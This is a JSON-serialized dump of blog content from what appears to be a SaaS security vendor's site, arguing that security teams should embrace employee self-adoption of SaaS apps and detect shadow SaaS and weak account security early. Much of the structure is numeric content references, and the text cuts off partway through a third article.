developer or support engineer with a weak password or missing MFA is all it takes for them to get phished, kicking off this string of attacks. Unlike the complex supply chain risk questions, account security issues are straightforward to fix. We’d be a whole lot closer to securing the whole supply chain if we could improve account security for all employees across all the SaaS apps they use. ",[],{},{"nodeType":169,"data":281766,"content":281767},{},[281768],{"nodeType":173,"value":281769,"marks":281770,"data":281771},"Where do we go from here?",[],{},{"nodeType":178,"data":281773,"content":281774},{},[281775],{"nodeType":173,"value":281776,"marks":281777,"data":281778},"So we’ve discussed the domino-like string of effects from SaaS sales, to PLG, to self-adoption, to shadow SaaS, to growing SaaS risks and the news stories we read about.",[],{},{"nodeType":178,"data":281780,"content":281781},{},[281782],{"nodeType":173,"value":281783,"marks":281784,"data":281785},"We’ve unpacked the shared responsibility model - and I hope I’ve convinced you that we need to look at both the supply chain and account security side equally (and in parallel!) to manage this risk. ",[],{},"SaaS sprawl isn't a problem - if you completely change your approach","Employees using a new work app used to be the final step of the software-onboarding process. Now it's the first. Security must adapt to secure business data. \n","2023-06-22T00:00:00.000Z","saas-has-changed-how-we-adopt-software-how-should-security-adapt",{"items":281791},[281792,281794],{"sys":281793,"name":505},{"id":504},{"sys":281795,"name":274157},{"id":274156},{"items":281797},[281798],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":281799},{"url":13981},{"__typename":1528,"sys":281801,"content":281803,"title":282544,"synopsis":282545,"hashTags":118,"publishedDate":282546,"slug":282547,"tagsCollection":282548,"authorsCollection":282554},{"id":281802},"6ppEa7WXiKcgLQ9yGn7q3k",{"json":281804},{"nodeType":165,"data":281805,"content":281806},{},[281807,281814,281820,281827,281836,281843,281848,281855,281860,281867,281874,281881,281888,281895,281901,281908,281915,281922,281937,281944,281951,281956,281962,281968,281984,282003,282010,282017,282024,282031,282038,282045,282065,282072,282079,282086,282093,282100,282107,282114,282121,282135,282165,282174,282180,282187,282194,282201,282224,282231,282238,282245,282252,282259,282266,282273,282280,282285,282292,282299,282306,282318,282325,282332,282339,282344,282351,282358,282365,282388,282395,282402,282409,282424,282431,282438,282445,282505,282511,282518,282525,282532,282538],{"nodeType":178,"data":281808,"content":281809},{},[281810],{"nodeType":173,"value":281811,"marks":281812,"data":281813},"Employees using a new work SaaS application used to be the final step of the software-onboarding process. ",[],{},{"nodeType":178,"data":281815,"content":281816},{},[281817],{"nodeType":173,"value":280354,"marks":281818,"data":281819},[],{},{"nodeType":178,"data":281821,"content":281822},{},[281823],{"nodeType":173,"value":281824,"marks":281825,"data":281826},"SaaS providers bypass IT and security and hook employees with free apps and trials. This has led to sensitive data on shadow SaaS applications that’s accessible via unmanaged cloud accounts – all those accounts that aren’t protected by SSO or logged into via social login accounts. This leads to security threats because attackers know SaaS is a blind spot for most organizations.",[],{},{"nodeType":178,"data":281828,"content":281829},{},[281830],{"nodeType":173,"value":281831,"marks":281832,"data":281835},"Attackers exploit this unmonitored attack surface with new takes on old techniques that are going undetected.",[281833,281834],{"type":370},{"type":1646},{},{"nodeType":178,"data":281837,"content":281838},{},[281839],{"nodeType":173,"value":281840,"marks":281841,"data":281842},"We’ve gone from this:",[],{},{"nodeType":312,"data":281844,"content":281847},{"target":281845},{"sys":281846},{"id":280474,"type":317,"linkType":318},[],{"nodeType":178,"data":281849,"content":281850},{},[281851],{"nodeType":173,"value":281852,"marks":281853,"data":281854},"To this: ",[],{},{"nodeType":312,"data":281856,"content":281859},{"target":281857},{"sys":281858},{"id":280624,"type":317,"linkType":318},[],{"nodeType":178,"data":281861,"content":281862},{},[281863],{"nodeType":173,"value":281864,"marks":281865,"data":281866},"Security is now coming in at the end of their old software procurement process and needs to figure out how to regain control of their data. ",[],{},{"nodeType":169,"data":281868,"content":281869},{},[281870],{"nodeType":173,"value":281871,"marks":281872,"data":281873},"You don’t want to stop employees from adopting SaaS apps… ",[],{},{"nodeType":178,"data":281875,"content":281876},{},[281877],{"nodeType":173,"value":281878,"marks":281879,"data":281880},"Employees self-adopting SaaS platforms might sound like a security nightmare, but it doesn’t have to be. This actually enables employees to be more productive and your business to be more competitive. ",[],{},{"nodeType":178,"data":281882,"content":281883},{},[281884],{"nodeType":173,"value":281885,"marks":281886,"data":281887},"This new landscape has fundamentally changed how software is brought into the business. The days of security acting as a gatekeeper that all apps must pass through before they can touch live data are over. The market forces driving self-service apps aren’t stopping, so the security industry needs to adapt.",[],{},{"nodeType":169,"data":281889,"content":281890},{},[281891],{"nodeType":173,"value":281892,"marks":281893,"data":281894},"What’s the impact of self-adoption on security?",[],{},{"nodeType":235,"data":281896,"content":281897},{},[281898],{"nodeType":173,"value":280712,"marks":281899,"data":281900},[],{},{"nodeType":178,"data":281902,"content":281903},{},[281904],{"nodeType":173,"value":281905,"marks":281906,"data":281907},"Most SaaS providers have moved to the product-led growth (PLG) model as the fastest and easiest way to get users for their apps. They want employees to start using SaaS without going through IT and security teams’ lengthy approval processes. This SaaS vendor sales model has had a massive impact on security and introduced SaaS security risks, but most security teams are unaware of the scale and scope of the problem because they can’t get necessary visibility into all the tools and apps their employees are using.",[],{},{"nodeType":235,"data":281909,"content":281910},{},[281911],{"nodeType":173,"value":281912,"marks":281913,"data":281914},"Shadow SaaS",[],{},{"nodeType":178,"data":281916,"content":281917},{},[281918],{"nodeType":173,"value":281919,"marks":281920,"data":281921},"This problem is often called “Shadow SaaS” and it’s also the first problem to solve -  the old adage “you can’t secure what you don’t know about” is as true in the SaaS world as it is in any other security domain.",[],{},{"nodeType":178,"data":281923,"content":281924},{},[281925,281929,281934],{"nodeType":173,"value":281926,"marks":281927,"data":281928},"The lack of visibility means many IT and security teams missed the explosion of SaaS apps, plugins, extensions, and integrations that make up the modern IT stack. More crucially,",[],{},{"nodeType":173,"value":281930,"marks":281931,"data":281933}," they’ve missed the movement of company data into these apps.",[281932],{"type":1646},{},{"nodeType":173,"value":10557,"marks":281935,"data":281936},[],{},{"nodeType":235,"data":281938,"content":281939},{},[281940],{"nodeType":173,"value":281941,"marks":281942,"data":281943},"SaaS Sprawl",[],{},{"nodeType":178,"data":281945,"content":281946},{},[281947],{"nodeType":173,"value":281948,"marks":281949,"data":281950},"Complicating matters further, many of these apps are duplicate, abandoned or unmanaged - an issue often called “SaaS sprawl.”",[],{},{"nodeType":312,"data":281952,"content":281955},{"target":281953},{"sys":281954},{"id":280733,"type":317,"linkType":318},[],{"nodeType":235,"data":281957,"content":281958},{},[281959],{"nodeType":173,"value":280739,"marks":281960,"data":281961},[],{},{"nodeType":178,"data":281963,"content":281964},{},[281965],{"nodeType":173,"value":280746,"marks":281966,"data":281967},[],{},{"nodeType":178,"data":281969,"content":281970},{},[281971,281975,281980],{"nodeType":173,"value":281972,"marks":281973,"data":281974},"In both cases, ",[],{},{"nodeType":173,"value":281976,"marks":281977,"data":281979},"Security is getting visibility too late to be of much value",[281978],{"type":1646},{},{"nodeType":173,"value":281981,"marks":281982,"data":281983},". Once a team has been using an app (even on a free tier) for a year, there’s not much Security can do that will convince employees/teams to move to a more secure app. ",[],{},{"nodeType":178,"data":281985,"content":281986},{},[281987,281993,281998],{"nodeType":173,"value":281988,"marks":281989,"data":281992},"To change that, Security needs to intervene and get involved very early in the app adoption process ",[281990,281991],{"type":370},{"type":1646},{},{"nodeType":173,"value":281994,"marks":281995,"data":281997},"- long before finance is involved.",[281996],{"type":1646},{},{"nodeType":173,"value":10557,"marks":281999,"data":282002},[282000,282001],{"type":370},{"type":1646},{},{"nodeType":178,"data":282004,"content":282005},{},[282006],{"nodeType":173,"value":282007,"marks":282008,"data":282009},"Incident Response is necessary, of course, when a SaaS account is breached, but can’t recover the lost data after attackers have had access to it. ",[],{},{"nodeType":235,"data":282011,"content":282012},{},[282013],{"nodeType":173,"value":282014,"marks":282015,"data":282016},"Holy S*it - there are so many apps!",[],{},{"nodeType":178,"data":282018,"content":282019},{},[282020],{"nodeType":173,"value":282021,"marks":282022,"data":282023},"Once teams get visibility into the scope of the Shadow SaaS and sprawl problem, they’re usually surprised by the sheer volume of apps employees have adopted. \n\nThen they realize they need to do risk assessments on dozens of apps a month instead of the dozen a year that were going through IT in the old, managed and controlled process. To deal with this massive influx of new apps, security teams feel they must either radically increase the headcount, cut corners or drastically increase acceptable risk levels for data security. Neither of these are great options.",[],{},{"nodeType":235,"data":282025,"content":282026},{},[282027],{"nodeType":173,"value":282028,"marks":282029,"data":282030},"This is why SSPMs and CASBs exist, right?",[],{},{"nodeType":178,"data":282032,"content":282033},{},[282034],{"nodeType":173,"value":282035,"marks":282036,"data":282037},"SaaS Security Posture Management (SSPMs) and Cloud Access Security Brokers (CASBs) are the most common categories of solutions meant to attack this visibility blindspot issue, but none of these tools are getting the full picture of the problem. ",[],{},{"nodeType":178,"data":282039,"content":282040},{},[282041],{"nodeType":173,"value":282042,"marks":282043,"data":282044},"At best, they simply chip away at the problem and make security feel like they’ve got a handle on employee-adopted SaaS. At worst, they give a false sense of security while only actually covering a small portion of the SaaS apps where business data actually lives. ",[],{},{"nodeType":178,"data":282046,"content":282047},{},[282048,282052,282062],{"nodeType":173,"value":282049,"marks":282050,"data":282051},"The key thing to consider about any of these solutions is what data sources they’re using to collect (typically network data, financial records, email data, application or endpoint data). We won’t dig into the full list of pros and cons of these types of tools, but we encourage you to read about them more ",[],{},{"nodeType":1698,"data":282053,"content":282057},{"target":282054},{"sys":282055},{"id":282056,"type":317,"linkType":318},"45iZ69EdPF4629gZ6yf7p5",[282058],{"nodeType":173,"value":28052,"marks":282059,"data":282061},[282060],{"type":194},{},{"nodeType":173,"value":197,"marks":282063,"data":282064},[],{},{"nodeType":178,"data":282066,"content":282067},{},[282068],{"nodeType":173,"value":282069,"marks":282070,"data":282071},"SSPM tools typically don’t do SaaS discovery - they don’t find apps employees log into, but they do tackle the application hardening and monitoring problem because they focus on policy enforcement and log-monitoring through APIs. ",[],{},{"nodeType":178,"data":282073,"content":282074},{},[282075],{"nodeType":173,"value":282076,"marks":282077,"data":282078},"Both SSPMs and CASBs make sense logically as a way to regain control of the situation. But we’d like to challenge the thinking that regaining control has to mean enforcing rigid security policies and restricting app access. ",[],{},{"nodeType":169,"data":282080,"content":282081},{},[282082],{"nodeType":173,"value":282083,"marks":282084,"data":282085},"Adjust your thinking to secure SaaS",[],{},{"nodeType":235,"data":282087,"content":282088},{},[282089],{"nodeType":173,"value":282090,"marks":282091,"data":282092},"Resist the temptation to revert to the old ways ",[],{},{"nodeType":178,"data":282094,"content":282095},{},[282096],{"nodeType":173,"value":282097,"marks":282098,"data":282099},"When the idea of the options above proves daunting or impossible, Security often tries to revert to the old process - putting security measures in place to regain the ability to set the pace of adoption by re-establishing the gate. ",[],{},{"nodeType":178,"data":282101,"content":282102},{},[282103],{"nodeType":173,"value":282104,"marks":282105,"data":282106},"Practically, this means that you’re deploying technical controls to try block all SaaS apps until they are approved (and marked as allowed) by IT or Security. Technically, this makes total sense. But the unforeseen consequence is that it positions Security as blockers (aka the “Department of No”) and puts them at odds with the rest of the business, rather than working towards a shared goal. ",[],{},{"nodeType":235,"data":282108,"content":282109},{},[282110],{"nodeType":173,"value":282111,"marks":282112,"data":282113},"Why being the “Department of No” doesn’t work ",[],{},{"nodeType":178,"data":282115,"content":282116},{},[282117],{"nodeType":173,"value":282118,"marks":282119,"data":282120},"This block-everything-until-security-approves-it position requires incredible executive support to maintain. For all but the most risk-sensitive organizations (read .gov), this position also normalizes employee behavior to bypass Security in favor of working quickly and effectively. ",[],{},{"nodeType":178,"data":282122,"content":282123},{},[282124,282128,282132],{"nodeType":173,"value":282125,"marks":282126,"data":282127},"In the end, Security actually ",[],{},{"nodeType":173,"value":280833,"marks":282129,"data":282131},[282130],{"type":1646},{},{"nodeType":173,"value":280838,"marks":282133,"data":282134},[],{},{"nodeType":250,"data":282136,"content":282137},{},[282138,282147,282156],{"nodeType":254,"data":282139,"content":282140},{},[282141],{"nodeType":178,"data":282142,"content":282143},{},[282144],{"nodeType":173,"value":280851,"marks":282145,"data":282146},[],{},{"nodeType":254,"data":282148,"content":282149},{},[282150],{"nodeType":178,"data":282151,"content":282152},{},[282153],{"nodeType":173,"value":280861,"marks":282154,"data":282155},[],{},{"nodeType":254,"data":282157,"content":282158},{},[282159],{"nodeType":178,"data":282160,"content":282161},{},[282162],{"nodeType":173,"value":280871,"marks":282163,"data":282164},[],{},{"nodeType":178,"data":282166,"content":282167},{},[282168],{"nodeType":173,"value":282169,"marks":282170,"data":282173},"Each blocking action leads to a worse security outcome and blinds the security team further - losing control rather than regaining it.",[282171,282172],{"type":370},{"type":1646},{},{"nodeType":178,"data":282175,"content":282176},{},[282177],{"nodeType":173,"value":280887,"marks":282178,"data":282179},[],{},{"nodeType":235,"data":282181,"content":282182},{},[282183],{"nodeType":173,"value":282184,"marks":282185,"data":282186},"Don’t worry, there’s a better way, but you must adapt your thinking",[],{},{"nodeType":178,"data":282188,"content":282189},{},[282190],{"nodeType":173,"value":282191,"marks":282192,"data":282193},"The first thing we need to do as an industry is agree that we don’t want to be the blockers. We don’t want to stop employees from self-adopting apps. We understand they are best placed to find and select the tools that are going to allow them to be more productive and help your company succeed. ",[],{},{"nodeType":178,"data":282195,"content":282196},{},[282197],{"nodeType":173,"value":282198,"marks":282199,"data":282200},"We need to:",[],{},{"nodeType":250,"data":282202,"content":282203},{},[282204,282214],{"nodeType":254,"data":282205,"content":282206},{},[282207],{"nodeType":178,"data":282208,"content":282209},{},[282210],{"nodeType":173,"value":282211,"marks":282212,"data":282213},"embrace SaaS app self-adoption, and ",[],{},{"nodeType":254,"data":282215,"content":282216},{},[282217],{"nodeType":178,"data":282218,"content":282219},{},[282220],{"nodeType":173,"value":282221,"marks":282222,"data":282223},"stop asking employees to adapt to fit our legacy processes. ",[],{},{"nodeType":178,"data":282225,"content":282226},{},[282227],{"nodeType":173,"value":282228,"marks":282229,"data":282230},"Security can no longer be a gate with a default stance of “No, until.” Instead Security needs to be a partner that says “Yes, unless.”",[],{},{"nodeType":235,"data":282232,"content":282233},{},[282234],{"nodeType":173,"value":282235,"marks":282236,"data":282237},"From the “Department of No” to the “Department of Yes, Unless?”",[],{},{"nodeType":178,"data":282239,"content":282240},{},[282241],{"nodeType":173,"value":282242,"marks":282243,"data":282244},"To adapt to this new SaaS-first world, security must move from saying “No, until we’ve had time to fully vet and onboard this app officially” to “Yes! You can use that app, unless we quickly identify security risks that outweigh the value of the tool.”",[],{},{"nodeType":178,"data":282246,"content":282247},{},[282248],{"nodeType":173,"value":282249,"marks":282250,"data":282251},"We know this is deeply uncomfortable for many security practitioners, but it will lead to a better long-term outcome.",[],{},{"nodeType":169,"data":282253,"content":282254},{},[282255],{"nodeType":173,"value":282256,"marks":282257,"data":282258},"How to regain control of the SaaS explosion",[],{},{"nodeType":235,"data":282260,"content":282261},{},[282262],{"nodeType":173,"value":282263,"marks":282264,"data":282265},"Step 1: Understand how employees typically test drive and eventually adopt SaaS",[],{},{"nodeType":178,"data":282267,"content":282268},{},[282269],{"nodeType":173,"value":282270,"marks":282271,"data":282272},"Obviously, self-adoption of SaaS is fundamentally different to IT/Security adopted and managed from a risk perspective. With SaaS, there’s no giant commitment upfront. Apps don’t (usually) just go from unknown and unused to adopted in a day. Just like adopting software was a process for Security and IT back in the day, employees follow a (less rigid) process with SaaS - from testing > to using > to finding value > to inviting teammates, etc. ",[],{},{"nodeType":178,"data":282274,"content":282275},{},[282276],{"nodeType":173,"value":282277,"marks":282278,"data":282279},"The risk grows as we proceed through the adoption process as employees add more data into the app and integrate it with other apps. The workflow below outlines a fairly typical SaaS testing and adopting process for employees:",[],{},{"nodeType":312,"data":282281,"content":282284},{"target":282282},{"sys":282283},{"id":280936,"type":317,"linkType":318},[],{"nodeType":235,"data":282286,"content":282287},{},[282288],{"nodeType":173,"value":282289,"marks":282290,"data":282291},"Step 2: Get involved early to have a real security impact",[],{},{"nodeType":178,"data":282293,"content":282294},{},[282295],{"nodeType":173,"value":282296,"marks":282297,"data":282298},"The upside for Security is that because SaaS adoption is a process over time, we can use that time to assess the risk of the app before it’s fully adopted, as long as we know about the app from the start. ",[],{},{"nodeType":178,"data":282300,"content":282301},{},[282302],{"nodeType":173,"value":282303,"marks":282304,"data":282305},"The goal is to catch those apps that are high risk, either because the data going into them (or that will be) is high risk or because the app can perform some high-risk action (like managing your inventory or sending emails to customers or your behalf). Security can focus their efforts on these high-risk vendors and apps to make sure they can be trusted with their data. ",[],{},{"nodeType":178,"data":282307,"content":282308},{},[282309,282313],{"nodeType":173,"value":282310,"marks":282311,"data":282312},"But this is key: ",[],{},{"nodeType":173,"value":282314,"marks":282315,"data":282317},"Security needs to get involved early in the adoption process. ",[282316],{"type":1646},{},{"nodeType":235,"data":282319,"content":282320},{},[282321],{"nodeType":173,"value":282322,"marks":282323,"data":282324},"Step 3: Get real-time visibility into SaaS apps and risks as employees sign up for them",[],{},{"nodeType":178,"data":282326,"content":282327},{},[282328],{"nodeType":173,"value":282329,"marks":282330,"data":282331},"You guessed it - Push can help!",[],{},{"nodeType":178,"data":282333,"content":282334},{},[282335],{"nodeType":173,"value":282336,"marks":282337,"data":282338},"We detect employees signing up to new apps and integrating third-party apps to your core work platforms in real-time. That allows you to step in at the earliest opportunity to vet the app for critical issues and guide the employee through the appropriate app onboarding steps. This allows you to focus on the new stuff and buy yourself time. ",[],{},{"nodeType":312,"data":282340,"content":282343},{"target":282341},{"sys":282342},{"id":274541,"type":317,"linkType":318},[],{"nodeType":235,"data":282345,"content":282346},{},[282347],{"nodeType":173,"value":282348,"marks":282349,"data":282350},"Step 4: Avoid wasting time on false-positives",[],{},{"nodeType":178,"data":282352,"content":282353},{},[282354],{"nodeType":173,"value":282355,"marks":282356,"data":282357},"You need to trust your data if you want to take action based on the visibility you have of what apps employees are using and how they’re using them. Doing risk assessments or chasing employees about apps they’re not using wastes time and burns goodwill. ",[],{},{"nodeType":178,"data":282359,"content":282360},{},[282361],{"nodeType":173,"value":282362,"marks":282363,"data":282364},"Good data allows you to:",[],{},{"nodeType":250,"data":282366,"content":282367},{},[282368,282378],{"nodeType":254,"data":282369,"content":282370},{},[282371],{"nodeType":178,"data":282372,"content":282373},{},[282374],{"nodeType":173,"value":282375,"marks":282376,"data":282377},"Quickly and accurately identify new SaaS apps and integrations as employees adopt them. ",[],{},{"nodeType":254,"data":282379,"content":282380},{},[282381],{"nodeType":178,"data":282382,"content":282383},{},[282384],{"nodeType":173,"value":282385,"marks":282386,"data":282387},"Identify the security issues that attackers can exploit to compromise your data through common attacks like Credential Stuffing. ",[],{},{"nodeType":235,"data":282389,"content":282390},{},[282391],{"nodeType":173,"value":282392,"marks":282393,"data":282394},"Step 5: Use Browser extension data to get the most accurate and useful data for SaaS visibility and risk ",[],{},{"nodeType":178,"data":282396,"content":282397},{},[282398],{"nodeType":173,"value":282399,"marks":282400,"data":282401},"Push collects data directly from the app using a browser extension, rather than guessing possible use from other sources like network traffic or email. ",[],{},{"nodeType":178,"data":282403,"content":282404},{},[282405],{"nodeType":173,"value":282406,"marks":282407,"data":282408},"That makes Push the only SaaS security solution that can directly observe all SaaS use and the only solution that can identify account security issues across hundreds of apps - completely automatically. ",[],{},{"nodeType":178,"data":282410,"content":282411},{},[282412,282416,282420],{"nodeType":173,"value":282413,"marks":282414,"data":282415},"No need for API support, no need for an admin account. It just works. For ",[],{},{"nodeType":173,"value":236043,"marks":282417,"data":282419},[282418],{"type":370},{},{"nodeType":173,"value":282421,"marks":282422,"data":282423}," your SaaS.",[],{},{"nodeType":235,"data":282425,"content":282426},{},[282427],{"nodeType":173,"value":282428,"marks":282429,"data":282430},"Step 6: Identify account security risks and discover shadow SaaS at the same time",[],{},{"nodeType":178,"data":282432,"content":282433},{},[282434],{"nodeType":173,"value":282435,"marks":282436,"data":282437},"Of course you need to start by discovering SaaS and getting a reliable inventory - but this on its own won’t stop accounts on those apps from getting breached. The most common way SaaS accounts are breached is through attacks like credential stuffing that target weak, breached or shared passwords on accounts that don’t have MFA enabled. ",[],{},{"nodeType":178,"data":282439,"content":282440},{},[282441],{"nodeType":173,"value":282442,"marks":282443,"data":282444},"Push can identify account security issues to prevent these common attacks. These include:",[],{},{"nodeType":250,"data":282446,"content":282447},{},[282448,282457,282467,282476,282486,282495],{"nodeType":254,"data":282449,"content":282450},{},[282451],{"nodeType":178,"data":282452,"content":282453},{},[282454],{"nodeType":173,"value":273418,"marks":282455,"data":282456},[],{},{"nodeType":254,"data":282458,"content":282459},{},[282460],{"nodeType":178,"data":282461,"content":282462},{},[282463],{"nodeType":173,"value":282464,"marks":282465,"data":282466},"Guessable passwords",[],{},{"nodeType":254,"data":282468,"content":282469},{},[282470],{"nodeType":178,"data":282471,"content":282472},{},[282473],{"nodeType":173,"value":273438,"marks":282474,"data":282475},[],{},{"nodeType":254,"data":282477,"content":282478},{},[282479],{"nodeType":178,"data":282480,"content":282481},{},[282482],{"nodeType":173,"value":282483,"marks":282484,"data":282485},"Sharing passwords across multiple accounts",[],{},{"nodeType":254,"data":282487,"content":282488},{},[282489],{"nodeType":178,"data":282490,"content":282491},{},[282492],{"nodeType":173,"value":273458,"marks":282493,"data":282494},[],{},{"nodeType":254,"data":282496,"content":282497},{},[282498],{"nodeType":178,"data":282499,"content":282500},{},[282501],{"nodeType":173,"value":282502,"marks":282503,"data":282504},"Password manager use",[],{},{"nodeType":312,"data":282506,"content":282510},{"target":282507},{"sys":282508},{"id":282509,"type":317,"linkType":318},"3hR2N6WoP5WDyD6O6zdJP1",[],{"nodeType":178,"data":282512,"content":282513},{},[282514],{"nodeType":173,"value":282515,"marks":282516,"data":282517},"We identify these issues at the same time we discover shadow SaaS apps, so you can tackle account compromise at the same time as SaaS discovery to reduce your SaaS security risk exposure faster.",[],{},{"nodeType":235,"data":282519,"content":282520},{},[282521],{"nodeType":173,"value":282522,"marks":282523,"data":282524},"Step 7: Automatically reduce the risks we find by engaging employees",[],{},{"nodeType":178,"data":282526,"content":282527},{},[282528],{"nodeType":173,"value":282529,"marks":282530,"data":282531},"How do we actually reduce the risks? We engage employees directly via Slack or MS Teams, explain the account security issue we’ve identified in a way they’ll understand, and help them understand how it’s putting them and the business at risk. Then we guide them on how to fix it.",[],{},{"nodeType":312,"data":282533,"content":282537},{"target":282534},{"sys":282535},{"id":282536,"type":317,"linkType":318},"7Hgf81IlfZKoUMOp26ZXmq",[],{"nodeType":178,"data":282539,"content":282540},{},[282541],{"nodeType":173,"value":37,"marks":282542,"data":282543},[],{},"7 Steps to secure your data across shadow SaaS apps","Attackers commonly target SaaS apps because they know employees sign up without running them past IT first. Learn how to adjust to secure your data.\n","2023-06-26T00:00:00.000Z","3-steps-to-secure-your-data-across-shadow-saas-apps",{"items":282549},[282550,282552],{"sys":282551,"name":274157},{"id":274156},{"sys":282553,"name":26133},{"id":26132},{"items":282555},[282556],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":282558},"The Push Team",{"url":282559},"https://images.ctfassets.net/y1cdw1ablpvd/7xpR9kiHAQWtZBj2rpOmmU/052ddfbb96afb37962278062047ab16d/Twitter_Linkedin_icon_white.png",{"items":282561},[282562],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":282563},{"url":273636},{"json":282565,"links":282902},{"nodeType":165,"data":282566,"content":282567},{},[282568,282574,282580,282586,282592,282599,282605,282611,282617,282622,282628,282634,282640,282646,282651,282657,282663,282668,282674,282680,282686,282695,282701,282716,282764,282769,282775,282781,282786,282792,282798,282814,282819,282825,282846,282852,282857,282864,282870,282875,282885,282891,282896],{"nodeType":169,"data":282569,"content":282570},{},[282571],{"nodeType":173,"value":258287,"marks":282572,"data":282573},[],{},{"nodeType":178,"data":282575,"content":282576},{},[282577],{"nodeType":173,"value":273246,"marks":282578,"data":282579},[],{},{"nodeType":178,"data":282581,"content":282582},{},[282583],{"nodeType":173,"value":273253,"marks":282584,"data":282585},[],{},{"nodeType":178,"data":282587,"content":282588},{},[282589],{"nodeType":173,"value":273260,"marks":282590,"data":282591},[],{},{"nodeType":178,"data":282593,"content":282594},{},[282595],{"nodeType":173,"value":273267,"marks":282596,"data":282598},[282597],{"type":370},{},{"nodeType":178,"data":282600,"content":282601},{},[282602],{"nodeType":173,"value":273275,"marks":282603,"data":282604},[],{},{"nodeType":178,"data":282606,"content":282607},{},[282608],{"nodeType":173,"value":273282,"marks":282609,"data":282610},[],{},{"nodeType":178,"data":282612,"content":282613},{},[282614],{"nodeType":173,"value":273289,"marks":282615,"data":282616},[],{},{"nodeType":312,"data":282618,"content":282621},{"target":282619},{"sys":282620},{"id":169040,"type":317,"linkType":318},[],{"nodeType":169,"data":282623,"content":282624},{},[282625],{"nodeType":173,"value":273301,"marks":282626,"data":282627},[],{},{"nodeType":178,"data":282629,"content":282630},{},[282631],{"nodeType":173,"value":273308,"marks":282632,"data":282633},[],{},{"nodeType":235,"data":282635,"content":282636},{},[282637],{"nodeType":173,"value":273315,"marks":282638,"data":282639},[],{},{"nodeType":178,"data":282641,"content":282642},{},[282643],{"nodeType":173,"value":273322,"marks":282644,"data":282645},[],{},{"nodeType":312,"data":282647,"content":282650},{"target":282648},{"sys":282649},{"id":273329,"type":317,"linkType":318},[],{"nodeType":235,"data":282652,"content":282653},{},[282654],{"nodeType":173,"value":273335,"marks":282655,"data":282656},[],{},{"nodeType":178,"data":282658,"content":282659},{},[282660],{"nodeType":173,"value":273342,"marks":282661,"data":282662},[],{},{"nodeType":312,"data":282664,"content":282667},{"target":282665},{"sys":282666},{"id":273349,"type":317,"linkType":318},[],{"nodeType":235,"data":282669,"content":282670},{},[282671],{"nodeType":173,"value":273355,"marks":282672,"data":282673},[],{},{"nodeType":178,"data":282675,"content":282676},{},[282677],{"nodeType":173,"value":273362,"marks":282678,"data":282679},[],{},{"nodeType":178,"data":282681,"content":282682},{},[282683],{"nodeType":173,"value":273369,"marks":282684,"data":282685},[],{},{"nodeType":3769,"data":282687,"content":282688},{},[282689],{"nodeType":178,"data":282690,"content":282691},{},[282692],{"nodeType":173,"value":273379,"marks":282693,"data":282694},[],{},{"nodeType":235,"data":282696,"content":282697},{},[282698],{"nodeType":173,"value":273386,"marks":282699,"data":282700},[],{},{"nodeType":178,"data":282702,"content":282703},{},[282704,282707,282713],{"nodeType":173,"value":273393,"marks":282705,"data":282706},[],{},{"nodeType":186,"data":282708,"content":282709},{"uri":273398},[282710],{"nodeType":173,"value":273401,"marks":282711,"data":282712},[],{},{"nodeType":173,"value":273405,"marks":282714,"data":282715},[],{},{"nodeType":250,"data":282717,"content":282718},{},[282719,282728,282737,282746,282755],{"nodeType":254,"data":282720,"content":282721},{},[282722],{"nodeType":178,"data":282723,"content":282724},{},[282725],{"nodeType":173,"value":273418,"marks":282726,"data":282727},[],{},{"nodeType":254,"data":282729,"content":282730},{},[282731],{"nodeType":178,"data":282732,"content":282733},{},[282734],{"nodeType":173,"value":273428,"marks":282735,"data":282736},[],{},{"nodeType":254,"data":282738,"content":282739},{},[282740],{"nodeType":178,"data":282741,"content":282742},{},[282743],{"nodeType":173,"value":273438,"marks":282744,"data":282745},[],{},{"nodeType":254,"data":282747,"content":282748},{},[282749],{"nodeType":178,"data":282750,"content":282751},{},[282752],{"nodeType":173,"value":273448,"marks":282753,"data":282754},[],{},{"nodeType":254,"data":282756,"content":282757},{},[282758],{"nodeType":178,"data":282759,"content":282760},{},[282761],{"nodeType":173,"value":273458,"marks":282762,"data":282763},[],{},{"nodeType":312,"data":282765,"content":282768},{"target":282766},{"sys":282767},{"id":273465,"type":317,"linkType":318},[],{"nodeType":178,"data":282770,"content":282771},{},[282772],{"nodeType":173,"value":273471,"marks":282773,"data":282774},[],{},{"nodeType":178,"data":282776,"content":282777},{},[282778],{"nodeType":173,"value":273478,"marks":282779,"data":282780},[],{},{"nodeType":312,"data":282782,"content":282785},{"target":282783},{"sys":282784},{"id":273485,"type":317,"linkType":318},[],{"nodeType":235,"data":282787,"content":282788},{},[282789],{"nodeType":173,"value":273491,"marks":282790,"data":282791},[],{},{"nodeType":178,"data":282793,"content":282794},{},[282795],{"nodeType":173,"value":273498,"marks":282796,"data":282797},[],{},{"nodeType":178,"data":282799,"content":282800},{},[282801,282804,282811],{"nodeType":173,"value":273505,"marks":282802,"data":282803},[],{},{"nodeType":186,"data":282805,"content":282806},{"uri":182804},[282807],{"nodeType":173,"value":273512,"marks":282808,"data":282810},[282809],{"type":194},{},{"nodeType":173,"value":197,"marks":282812,"data":282813},[],{},{"nodeType":312,"data":282815,"content":282818},{"target":282816},{"sys":282817},{"id":273523,"type":317,"linkType":318},[],{"nodeType":178,"data":282820,"content":282821},{},[282822],{"nodeType":173,"value":273529,"marks":282823,"data":282824},[],{},{"nodeType":250,"data":282826,"content":282827},{},[282828,282837],{"nodeType":254,"data":282829,"content":282830},{},[282831],{"nodeType":178,"data":282832,"content":282833},{},[282834],{"nodeType":173,"value":273542,"marks":282835,"data":282836},[],{},{"nodeType":254,"data":282838,"content":282839},{},[282840],{"nodeType":178,"data":282841,"content":282842},{},[282843],{"nodeType":173,"value":273552,"marks":282844,"data":282845},[],{},{"nodeType":178,"data":282847,"content":282848},{},[282849],{"nodeType":173,"value":273559,"marks":282850,"data":282851},[],{},{"nodeType":312,"data":282853,"content":282856},{"target":282854},{"sys":282855},{"id":273566,"type":317,"linkType":318},[],{"nodeType":178,"data":282858,"content":282859},{},[282860],{"nodeType":173,"value":273572,"marks":282861,"data":282863},[282862],{"type":370},{},{"nodeType":178,"data":282865,"content":282866},{},[282867],{"nodeType":173,"value":273580,"marks":282868,"data":282869},[],{},{"nodeType":312,"data":282871,"content":282874},{"target":282872},{"sys":282873},{"id":273587,"type":317,"linkType":318},[],{"nodeType":235,"data":282876,"content":282877},{},[282878,282881],{"nodeType":173,"value":273593,"marks":282879,"data":282880},[],{},{"nodeT